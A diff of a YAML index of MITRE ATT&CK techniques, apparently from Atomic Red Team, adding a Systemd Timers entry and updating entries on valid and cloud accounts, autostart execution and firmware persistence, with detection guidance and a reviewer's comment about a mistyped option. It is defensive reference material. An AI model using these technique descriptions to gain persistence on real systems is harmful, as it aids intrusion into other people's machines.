- - source_name: gist Arch package compromise 10JUL2018
- url: https://gist.github.com/campuscodi/74d0d2e35d8fd9499c76333ce027345a
- description: Catalin Cimpanu. (2018, July 10). ~x file downloaded in public
- Arch package compromise. Retrieved April 23, 2019.
- - source_name: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018
- url: https://www.bleepingcomputer.com/news/security/malware-found-in-arch-linux-aur-package-repository/
- description: Catalin Cimpanu. (2018, July 10). Malware Found in Arch Linux
- AUR Package Repository. Retrieved April 23, 2019.
- - source_name: acroread package compromised Arch Linux Mail 8JUL2018
- url: https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html
- description: Eli Schwartz. (2018, June 8). acroread package compromised. Retrieved
- April 23, 2019.
- source_name: Rapid7 Service Persistence 22JUNE2016
url: https://www.rapid7.com/db/modules/exploit/linux/local/service_persistence
description: Rapid7. (2016, June 22). Service Persistence. Retrieved April
@@ -7372,7 +7575,7 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-25T22:13:59.473Z'
+ modified: '2020-10-09T13:46:29.701Z'
created: '2020-01-17T16:15:19.870Z'
x_mitre_platforms:
- Linux
@@ -7386,7 +7589,7 @@ privilege-escalation:
- User
- root
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- Process command-line parameters
- Process monitoring
@@ -7461,6 +7664,73 @@ privilege-escalation:
rm -rf #{systemd_service_path}/#{systemd_service_file}
systemctl daemon-reload
name: bash
+ T1053.006:
+ technique:
+ id: attack-pattern--a542bac9-7bc1-4da7-9a09-96f69e23cc21
+ description: |-
+ Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020)
+
+ Each .timer file must have a corresponding .service file with the same name, e.g., example.timer and example.service. .service files are [Systemd Service](https://attack.mitre.org/techniques/T1543/002) unit files that are managed by the systemd system and service manager.(Citation: Linux man-pages: systemd January 2014) Privileged timers are written to /etc/systemd/system/ and /usr/lib/systemd/system while user level are written to ~/.config/systemd/user/.
+
+ An adversary may use systemd timers to execute malicious code at system startup or on a scheduled basis for persistence.(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: gist Arch package compromise 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018) Timers installed using privileged paths may be used to maintain root level persistence. Adversaries may also install user level timers to achieve user level persistence.
+ name: Systemd Timers
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1053.006
+ url: https://attack.mitre.org/techniques/T1053/006
+ - source_name: archlinux Systemd Timers Aug 2020
+ url: https://wiki.archlinux.org/index.php/Systemd/Timers
+ description: archlinux. (2020, August 11). systemd/Timers. Retrieved October
+ 12, 2020.
+ - source_name: 'Linux man-pages: systemd January 2014'
+ url: http://man7.org/linux/man-pages/man1/systemd.1.html
+ description: Linux man-pages. (2014, January). systemd(1) - Linux manual page.
+ Retrieved April 23, 2019.
+ - description: Catalin Cimpanu. (2018, July 10). Malware Found in Arch Linux
+ AUR Package Repository. Retrieved April 23, 2019.
+ url: https://www.bleepingcomputer.com/news/security/malware-found-in-arch-linux-aur-package-repository/
+ source_name: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018
+ - description: Catalin Cimpanu. (2018, July 10). ~x file downloaded in public
+ Arch package compromise. Retrieved April 23, 2019.
+ url: https://gist.github.com/campuscodi/74d0d2e35d8fd9499c76333ce027345a
+ source_name: gist Arch package compromise 10JUL2018
+ - description: Eli Schwartz. (2018, June 8). acroread package compromised. Retrieved
+ April 23, 2019.
+ url: https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html
+ source_name: acroread package compromised Arch Linux Mail 8JUL2018
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ modified: '2020-10-14T15:20:00.754Z'
+ created: '2020-10-12T17:50:31.584Z'
+ x_mitre_platforms:
+ - Linux
+ x_mitre_contributors:
+ - SarathKumar Rajendran, Trimble Inc
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_detection: |-
+ Systemd timer unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and ~/.config/systemd/user/ directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user.
+
+ Suspicious systemd timers can also be identified by comparing results against a trusted system baseline. Malicious systemd timers may be detected by using the systemctl utility to examine system wide timers: systemctl list-timers –all. Analyze the contents of corresponding .service files present on the file system and ensure that they refer to legitimate, expected executables.
+
+ Audit the execution and command-line arguments of the 'systemd-run' utility as it may be used to create timers.(Citation: archlinux Systemd Timers Aug 2020)
+ x_mitre_permissions_required:
+ - User
+ - root
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ atomic_tests: []
T1055.003:
technique:
external_references:
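Review bot: The `x_mitre_detection` block of the new T1053.006 entry contains an en dash in `systemctl list-timers –all`, so the command fails if an analyst copies it verbatim; the option is `--all`. The same block uses typographic quotes around ‘systemd’ and ‘root’, which suggests the text was carried over from a rendered page rather than from the original source. Since this entry appears to mirror the upstream ATT&CK STIX description (the `modified`/`created` stamps and `x_mitre_*` keys follow that format), the correction belongs in the generator's input data or upstream rather than as a hand edit here, or the next regeneration will reintroduce it. If the index is regenerated from the bundle, a small normalisation step that maps U+2013 before an option name to `--` would keep the detection guidance runnable.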
@@ -7885,13 +8155,8 @@ privilege-escalation:
atomic_tests: []
T1078:
technique:
- id: attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Valid Accounts
- description: |-
- Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
-
- The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft)
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1078
@@ -7907,8 +8172,13 @@ privilege-escalation:
description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
June 3, 2016.
source_name: TechNet Audit Policy
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ description: |-
+ Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
+
+ The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft)
+ name: Valid Accounts
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -7919,13 +8189,31 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2020-06-20T22:44:36.043Z'
+ modified: '2020-10-19T16:01:22.724Z'
created: '2017-05-31T21:31:00.645Z'
- x_mitre_is_subtechnique: false
- x_mitre_contributors:
- - Netskope
- - Mark Wee
- - Praetorian
+ x_mitre_version: '2.1'
+ x_mitre_data_sources:
+ - AWS CloudTrail logs
+ - Stackdriver logs
+ - Authentication logs
+ - Process monitoring
+ x_mitre_defense_bypassed:
+ - Firewall
+ - Host intrusion prevention systems
+ - Network intrusion detection system
+ - Application control
+ - System access controls
+ - Anti-virus
+ x_mitre_detection: |-
+ Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+
+ Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_effective_permissions:
+ - User
+ - Administrator
x_mitre_platforms:
- Linux
- macOS
@@ -7936,29 +8224,11 @@ privilege-escalation:
- SaaS
- Office 365
- Azure AD
- x_mitre_effective_permissions:
- - User
- - Administrator
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_detection: |-
- Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
-
- Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.
- x_mitre_defense_bypassed:
- - Firewall
- - Host intrusion prevention systems
- - Network intrusion detection system
- - Application control
- - System access controls
- - Anti-virus
- x_mitre_data_sources:
- - AWS CloudTrail logs
- - Stackdriver logs
- - Authentication logs
- - Process monitoring
- x_mitre_version: '2.1'
+ x_mitre_contributors:
+ - Netskope
+ - Mark Wee
+ - Praetorian
+ x_mitre_is_subtechnique: false
atomic_tests: []
T1546.003:
technique:
@@ -8102,6 +8372,15 @@ privilege-escalation:
- source_name: mitre-attack
external_id: T1543.003
url: https://attack.mitre.org/techniques/T1543/003
+ - external_id: CAPEC-478
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/478.html
+ - external_id: CAPEC-550
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/550.html
+ - external_id: CAPEC-551
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/551.html
- url: https://technet.microsoft.com/en-us/library/cc772408.aspx
description: Microsoft. (n.d.). Services. Retrieved June 7, 2016.
source_name: TechNet Services
@@ -8123,12 +8402,12 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-25T22:22:10.041Z'
+ modified: '2020-09-16T15:49:58.490Z'
created: '2020-01-17T19:13:50.402Z'
x_mitre_platforms:
- Windows
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_detection: "Monitor processes and command-line arguments for actions
that could create or modify services. Command-line invocation of tools capable
of adding or modifying services may be unusual, depending on how systems are
@@ -8668,7 +8947,7 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- modified: '2020-07-15T12:43:37.469Z'
+ modified: '2020-10-05T16:43:29.473Z'
created: '2017-05-31T21:31:12.196Z'
x_mitre_is_subtechnique: false
x_mitre_version: '2.1'
@@ -8925,42 +9204,59 @@ persistence:
url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
Principals. Retrieved January 19, 2020.
+ - source_name: GCP SSH Key Add
+ url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+ description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
+ October 1, 2020.
+ - source_name: Expel IO Evil in AWS
+ url: https://expel.io/blog/finding-evil-in-aws/
+ description: A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding
+ Evil in AWS. Retrieved June 25, 2020.
+ - source_name: Expel Behind the Scenes
+ url: https://expel.io/blog/behind-the-scenes-expel-soc-alert-aws/
+ description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
+ July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
+ October 1, 2020.'
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Additional Azure Service Principal Credentials
- description: 'Adversaries may add adversary-controlled credentials for Azure
- Service Principals in addition to existing legitimate credentials(Citation:
- Create Azure Service Principal) to maintain persistent access to victim Azure
- accounts.(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video)
- Azure Service Principals support both password and certificate credentials.(Citation:
- Why AAD Service Principals) With sufficient permissions, there are a variety
- of ways to add credentials including the Azure Portal, Azure command line
- interface, and Azure or Az [PowerShell](https://attack.mitre.org/techniques/T1059/001)
- modules.(Citation: Demystifying Azure AD Service Principals)'
+ name: Additional Cloud Credentials
+ description: |-
+ Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.
+
+ Adversaries may add credentials for Azure Service Principals in addition to existing legitimate credentials(Citation: Create Azure Service Principal) to victim Azure accounts.(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) Azure Service Principals support both password and certificate credentials.(Citation: Why AAD Service Principals) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az [PowerShell](https://attack.mitre.org/techniques/T1059/001) modules.(Citation: Demystifying Azure AD Service Principals)
+
+ After gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the CreateKeyPair or ImportKeyPair API in AWS or the gcloud compute os-login ssh-keys add command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes)
id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- modified: '2020-07-15T12:43:36.340Z'
+ modified: '2020-10-05T16:43:27.024Z'
created: '2020-01-19T16:10:15.008Z'
x_mitre_contributors:
+ - Expel
- Oleg Kolesnikov, Securonix
- Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
- x_mitre_version: '1.0'
+ x_mitre_version: '2.0'
x_mitre_is_subtechnique: true
x_mitre_permissions_required:
- Administrator
+ - User
x_mitre_detection: |-
- Monitor Azure Activity Logs for service principal modifications.
+ Monitor Azure Activity Logs for service principal modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
Monitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity.
x_mitre_data_sources:
+ - Stackdriver logs
+ - GCP audit logs
+ - AWS CloudTrail logs
- Azure activity logs
x_mitre_platforms:
- Azure AD
- Azure
+ - AWS
+ - GCP
atomic_tests: []
T1546.009:
technique:
@@ -9218,7 +9514,7 @@ persistence:
and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\custom\n\nTo
keep shims secure, Windows designed them to run in user mode so they cannot
modify the kernel and you must have administrator privileges to install a
- shim. However, certain shims can be used to [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002)
+ shim. However, certain shims can be used to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)
(UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data
Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH),
and intercept memory addresses (GetProcAddress).\n\nUtilizing these shims
@@ -9796,10 +10092,22 @@ persistence:
name: command_prompt
T1547:
technique:
+ id: attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf
+ description: |-
+ Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
+
+ Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges.
+ name: Boot or Logon Autostart Execution
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1547
url: https://attack.mitre.org/techniques/T1547
+ - external_id: CAPEC-564
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/564.html
- url: http://msdn.microsoft.com/en-us/library/aa376977
description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
12, 2014.
@@ -9823,29 +10131,18 @@ persistence:
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
source_name: TechNet Autoruns
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Boot or Logon Autostart Execution
- description: |-
- Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
-
- Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges.
- id: attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-06-30T21:23:15.683Z'
+ modified: '2020-10-09T16:05:36.772Z'
created: '2020-01-23T17:46:59.535Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: false
- x_mitre_permissions_required:
- - User
- - Administrator
- - root
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_detection: "Monitor for additions or modifications of mechanisms that
could be used to trigger autostart execution, such as relevant additions to
the Registry. Look for changes that are not correlated with known updates,
@@ -9864,10 +10161,12 @@ persistence:
Look for abnormal process behavior that may be due to a process loading a
malicious DLL.\n\nMonitor for abnormal usage of utilities and command-line
parameters involved in kernel modification or driver installation."
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - root
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '1.1'
atomic_tests: []
T1037:
technique:
@@ -9899,12 +10198,13 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-27T16:49:15.953Z'
+ modified: '2020-08-03T16:47:37.240Z'
created: '2017-05-31T21:30:38.910Z'
x_mitre_is_subtechnique: false
x_mitre_platforms:
- macOS
- Windows
+ - Linux
x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
or at abnormal times. Look for files added or modified by unusual accounts
outside of normal administration duties. Monitor running process for actions
@@ -9913,7 +10213,7 @@ persistence:
x_mitre_data_sources:
- File monitoring
- Process monitoring
- x_mitre_version: '2.0'
+ x_mitre_version: '2.1'
atomic_tests: []
T1542.003:
technique:
@@ -9921,6 +10221,9 @@ persistence:
- source_name: mitre-attack
external_id: T1542.003
url: https://attack.mitre.org/techniques/T1542/003
+ - external_id: CAPEC-552
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/552.html
- source_name: Mandiant M Trends 2016
url: https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf
description: Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved
@@ -9946,13 +10249,13 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-05-07T22:32:05.335Z'
+ modified: '2020-09-17T19:47:14.338Z'
created: '2019-12-19T21:05:38.123Z'
x_mitre_defense_bypassed:
- Host intrusion prevention systems
- Anti-virus
- File monitoring
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_permissions_required:
- Administrator
@@ -10160,7 +10463,7 @@ persistence:
The COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013)
- Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)
+ Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)
id: attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335
type: attack-pattern
kill_chain_phases:
@@ -10492,6 +10795,15 @@ persistence:
atomic_tests: []
T1078.004:
technique:
+ id: attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65
+ description: |-
+ Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)
+
+ Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment.
+ name: Cloud Accounts
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1078.004
@@ -10508,15 +10820,6 @@ persistence:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
description: Microsoft. (n.d.). Deploying Active Directory Federation Services
in Azure. Retrieved March 13, 2020.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Cloud Accounts
- description: |-
- Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory.(Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)
-
- Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment.
- id: attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -10527,21 +10830,8 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2020-03-23T21:59:36.729Z'
+ modified: '2020-10-19T16:01:22.090Z'
created: '2020-03-13T20:36:57.378Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_detection: Perform regular audits of cloud accounts to detect abnormal
- or malicious activity, such as accessing information outside of the normal
- function of the account or account usage at atypical hours.
- x_mitre_data_sources:
- - Azure activity logs
- - Authentication logs
- - AWS CloudTrail logs
- - Stackdriver logs
x_mitre_platforms:
- AWS
- GCP
@@ -10549,9 +10839,39 @@ persistence:
- SaaS
- Azure AD
- Office 365
+ x_mitre_data_sources:
+ - Azure activity logs
+ - Authentication logs
+ - AWS CloudTrail logs
+ - Stackdriver logs
+ x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
+ or malicious behavior, such as accessing information outside of the normal
+ function of the account or account usage at atypical hours.
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.1'
atomic_tests: []
T1542.002:
technique:
+ created: '2019-12-19T20:21:21.669Z'
+ modified: '2020-03-23T23:48:33.904Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ type: attack-pattern
+ id: attack-pattern--791481f8-e96a-41be-b089-a088763083d4
+ description: |-
+ Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
+
+ Malicious component firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.
+ name: Component Firmware
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1542.002
@@ -10567,44 +10887,27 @@ persistence:
health and make sure it's not already dying on you. Retrieved October 2,
2018.
source_name: ITWorld Hard Disk Health Dec 2014
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Component Firmware
- description: |-
- Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
-
- Malicious component firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.
- id: attack-pattern--791481f8-e96a-41be-b089-a088763083d4
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- modified: '2020-03-23T23:48:33.904Z'
- created: '2019-12-19T20:21:21.669Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_system_requirements:
- - Ability to update component device firmware from the host operating system.
- x_mitre_permissions_required:
- - SYSTEM
- x_mitre_defense_bypassed:
- - Anti-virus
- - Host intrusion prevention systems
- - File monitoring
- x_mitre_detection: |-
